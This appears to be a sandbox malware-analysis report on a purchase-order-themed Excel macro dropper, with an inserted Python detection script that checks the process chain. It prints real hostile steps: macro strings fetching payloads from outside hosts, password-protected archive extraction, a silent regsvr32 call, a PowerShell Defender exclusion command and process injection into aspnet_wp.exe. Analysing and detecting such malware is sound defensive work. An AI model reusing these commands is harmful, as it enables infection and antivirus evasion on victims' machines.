Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CCCE120
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC0C250
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CC62330
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE9BD60
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE07D40
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE05D80
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CDF98C0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CDF39DF
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE179C0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE31B40
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE2DAC0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE9B580
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE2B6E0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE01860
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CDF3800
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE297DD
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE95220
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE8D220
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE07360
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CF0D280
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE07460
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE2B440
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE97400
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE4B3A0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE9ACC0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CDF8E40
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE9CDC0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE8EEE0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CEA4EB0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CEB0900
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE2AB30
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE64AE0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE9EC20
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE08500
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CDFE5A0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE32770
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE1C756
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE461C0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE8C7A0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE2E140
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE30120
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE98260
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE461C0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CE64300
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CEA02B0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 28_2_00007FFC9CDF83D0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 33_2_00007FF6E44A7ED0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 33_2_00007FF6E44A57C0
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe Code function: 33_2_00007FF6E44A43E0
                          Source: PO202503D.xlsmOLE, VBA macro line: Private Sub Workbook_Open()
                          Source: PO202503D.xlsmOLE, VBA macro line: Private Sub Workbook_Open()
                          Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Workbook_OpenName: Workbook_Open
                          Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_OpenName: Workbook_Open
                          Source: PO202503D.xlsmOLE indicator, VBA macros: true
                          Source: PO202503D.xlsmStream path 'VBA/__SRP_0' : https://tursiian.com/7z.txt$7zip_installer.exe/S47-Zip installation failed!8ZIP file failed to download!2(7-Zip installed at:* 7-Zip found at:,$PO202502SNAKWS.zip"|https://f004.backblazeb2.com/file/mdocument/PO202502SNAKWS.zi|&ZIP downloaded to:* x -p123456 -y -oba).a(Extraction command:$*.*"Extracted files:$,,libcares-2.dll"nasrallah_x86.dll vcruntime210.dll$PO202502SNAKWS.exe"-#Z00:00:010c.EXE execution attempted.aFF!1Q1&mQ1@nasrallah_x86.dll not found at:*WScript.Shell2QRetry(: DLL exists=, EXE exists=:libcares-2.dll not found at: 6msvcp290.dll not found at:$@2iw<WYl|>vcruntime210.dll not found at: >PO202502SNAK.exe not found at:* Files verified:$ and(regsvr32.exe/s.2DLL registration output: LDLL registration attempted (no output)EXE output:"Run<Z>Z"Cleanup c
Source: ~DFE94CD9633EB51867.TMP.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe A52E245DD7937094711B10C479274A2CCCEA2DFB89F7D4C9F22879214718F92B
Source: Joe Sandbox View | Dropped File: C:\Users\user\SystemRootDoc\PO202502DAKE.exe A52E245DD7937094711B10C479274A2CCCEA2DFB89F7D4C9F22879214718F92B
Source: C:\Program Files\7-Zip\7z.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: String function: 00007FFC9CEA1280 appears 1076 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: String function: 00007FFC9CD85750 appears 210 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: String function: 00007FFC9CFC4440 appears 317 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: String function: 00007FFC9CF5E0B0 appears 67 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: String function: 00007FFC9CD852E0 appears 212 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: String function: 00007FFC9CFC4AEE appears 314 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: String function: 00007FFC9CD85330 appears 326 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: String function: 00007FFC9CFC4490 appears 436 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: String function: 00007FFC9CF5CE80 appears 1077 times
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: String function: 00007FFC9CD1EC60 appears 68 times
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: String function: 0000000140039058 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: String function: 0000000140029E0C appears 49 times
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Code function: String function: 00007FFC9CEACE80 appears 1077 times
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Code function: String function: 00007FFC9CDF1280 appears 1076 times
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Code function: String function: 00007FFC9CF14440 appears 317 times
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Code function: String function: 00007FFC9CCD52E0 appears 317 times
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Code function: String function: 00007FFC9CEAE0B0 appears 67 times
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Code function: String function: 00007FFC9CCD5330 appears 436 times
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Code function: String function: 00007FFC9CF14AEE appears 314 times
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Code function: String function: 00007FFC9CC6EC60 appears 67 times
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Code function: String function: 00007FFC9CF14490 appears 436 times
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Code function: String function: 00007FFC9CCD5750 appears 314 times
Source: PO202502DAKE.exe.9.dr | Static PE information: Number of sections : 11 > 10
Source: PO202502DAKE.exe.12.dr | Static PE information: Number of sections : 11 > 10
Source: 33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.PO202502DAKE.exe.1ff210716a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.PO202502DAKE.exe.2333c8716a0.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.PO202502DAKE.exe.2333c8716a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 35.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 35.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.PO202502DAKE.exe.21bc50716a0.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 30.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 30.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.PO202502DAKE.exe.1ff210716a0.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000023.00000002.1536508110.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000010.00000002.6605477392.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSM@29/22@12/3
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: 12_2_00007FFC9CC677E0 SetLastError,FormatMessageW,GetLastError,SetLastError,FormatMessageW,GetLastError
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: 12_2_00007FFC9CC69420 SetLastError,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Code function: 28_2_00007FFC9CBB9420 SetLastError,AdjustTokenPrivileges,GetLastError
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Code function: 16_2_00000001400158F0 CoCreateInstance
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\Desktop\~$PO202503D.xlsm
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2064:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Mutant created: \Sessions\1\BaseNamedObjects\{D07CA115-8673-43EE-BE20-82EE6E12ECD2}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8588:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Mutant created: \Sessions\1\BaseNamedObjects\{46C50A8D-10E4-41E2-836F-54C9A61C5C72}
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Mutant created: \Sessions\1\BaseNamedObjects\{DC23756C-1FD1-4CE9-BD12-02B965019D31}
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Mutant created: \Sessions\1\BaseNamedObjects\{1EBCA0EE-1DEE-485D-B8FB-8CD5A107F286}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8416:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8536:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe | Mutant created: \Sessions\1\BaseNamedObjects\{12072879-EF3A-4BDB-9E3A-DF4639F62493}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1304:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8360:120:WilError_03
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{3E33BBE1-1DC3-48B6-BA0E-8EA0D6D99267} - OProcSessId.dat
Source: PO202503D.xlsm | OLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\7-Zip\7z.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PO202503D.xlsm | Virustotal: Detection: 19%
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.zip"
Source: C:\Program Files\7-Zip\7z.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe"
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\PO202502DAKE.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\SystemRootDoc\PO202502DAKE.exe "C:\Users\user\SystemRootDoc\PO202502DAKE.exe"
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
Source: unknown | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\PO202502DAKE.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\SystemRootDoc\PO202502DAKE.exe "C:\Users\user\SystemRootDoc\PO202502DAKE.exe"
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.zip"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe"
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\SystemRootDoc\PO202502DAKE.exe "C:\Users\user\SystemRootDoc\PO202502DAKE.exe"
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\SystemRootDoc\PO202502DAKE.exe "C:\Users\user\SystemRootDoc\PO202502DAKE.exe"
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
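The process-creation rows above carry the whole chain in their command lines: Excel launching 7-Zip with a password-protected archive (-p123456) into the user's Temp, a silent regsvr32 /s of a DLL dropped there, the dropped executable adding a Defender exclusion with Add-MpPreference, and the same executable spawning aspnet_wp.exe, a .NET worker process that has no business being started from a user profile (the later YARA hits at 0x140000000 in aspnet_wp.exe show it is the injection target). The block below is an added example, not part of the Joe Sandbox report: it encodes those observations as detection checks and runs them over constructed Sysmon-style events (Image, ParentImage, CommandLine) whose values mirror the report's rows. The benign 7-Zip event and the -EncodedCommand variant of the exclusion cmdlet are assumptions added to show a non-match and the base64/UTF-16LE decoding a detector needs; neither appears in this report.

```python
"""Added example (not part of the Joe Sandbox report): detection checks for the
process chain listed above, run over constructed Sysmon-style process-creation
events. The events mirror the report's command lines but are hand-written
here; they are not records captured from the sandbox."""
import base64
import re


def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


OFFICE16 = r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE"
STAGE1 = r"C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe"

# Constructed sample events (Sysmon Event ID 1 fields). Rows 0-4 follow the
# report; row 5 is an assumed benign control; row 6 is an assumed encoded
# variant of the exclusion command, not something the report observed.
EVENTS = [
    {"Image": r"C:\Program Files\7-Zip\7z.exe", "ParentImage": OFFICE16,
     "CommandLine": r'"C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.zip"'},
    {"Image": r"C:\Windows\SysWOW64\regsvr32.exe", "ParentImage": OFFICE16,
     "CommandLine": r'"regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"'},
    {"Image": STAGE1, "ParentImage": OFFICE16, "CommandLine": f'"{STAGE1}"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": STAGE1,
     "CommandLine": r'''"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"'''},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe", "ParentImage": STAGE1,
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"'},
    {"Image": r"C:\Program Files\7-Zip\7z.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\7-Zip\7z.exe" x -y -o"C:\Users\user\Documents\out" "C:\Users\user\Documents\report.zip"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\user\SystemRootDoc\PO202502DAKE.exe",
     "CommandLine": "powershell.exe -NoP -EncodedCommand "
                    + encode_ps(r"Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc'")},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SUSPICIOUS_CHILDREN = {"7z.exe", "regsvr32.exe", "cmd.exe", "powershell.exe",
                       "wscript.exe", "cscript.exe", "mshta.exe"}
USER_PATH = re.compile(r"c:\\users\\[^\\]+\\", re.I)      # any user-writable profile path
ARCHIVE_PASSWORD = re.compile(r"\s-p\S+")                  # 7-Zip -p<password> switch
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def effective_commandline(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload, if present, so keyword
    checks see through the base64 layer. Undecodable blobs are left alone."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def detect(event: dict) -> list[str]:
    """Return the names of every check the event trips, in a fixed order."""
    img, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = effective_commandline(event["CommandLine"])
    low = cmd.lower()
    hits = []
    if parent in OFFICE_APPS and (img in SUSPICIOUS_CHILDREN or USER_PATH.search(event["Image"])):
        hits.append("office_spawns_lolbin_or_user_binary")
    if img == "7z.exe" and ARCHIVE_PASSWORD.search(cmd) and re.search(r'-o"?c:\\users\\', low):
        hits.append("password_archive_extracted_to_user_dir")
    if img == "regsvr32.exe" and "/s" in low and USER_PATH.search(cmd):
        hits.append("regsvr32_silent_user_dll")
    if img == "powershell.exe" and "add-mppreference" in low and "-exclusionpath" in low:
        hits.append("defender_exclusion_added")
    if img == "aspnet_wp.exe" and USER_PATH.search(event["ParentImage"]):
        hits.append("system_binary_spawned_from_user_dir")
    return hits


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> matched check names, only for events with a hit."""
    return {i: h for i, e in enumerate(events) if (h := detect(e))}


if __name__ == "__main__":
    for i, rules in scan(EVENTS).items():
        print(i, basename(EVENTS[i]["Image"]), rules)
```

The checks are deliberately keyed on parent/child relationships and command-line content rather than on the hashes or file names in this report, which the operator can change per campaign; the archive password, the Temp staging directory and the exclusion path are the parts that tend to survive such rotation. The last check is the one worth tuning for a given estate: aspnet_wp.exe is started by IIS, never by a binary under C:\Users, so a parent in a user profile is a strong signal on its own.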
                          Source: C:\Program Files\7-Zip\7z.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
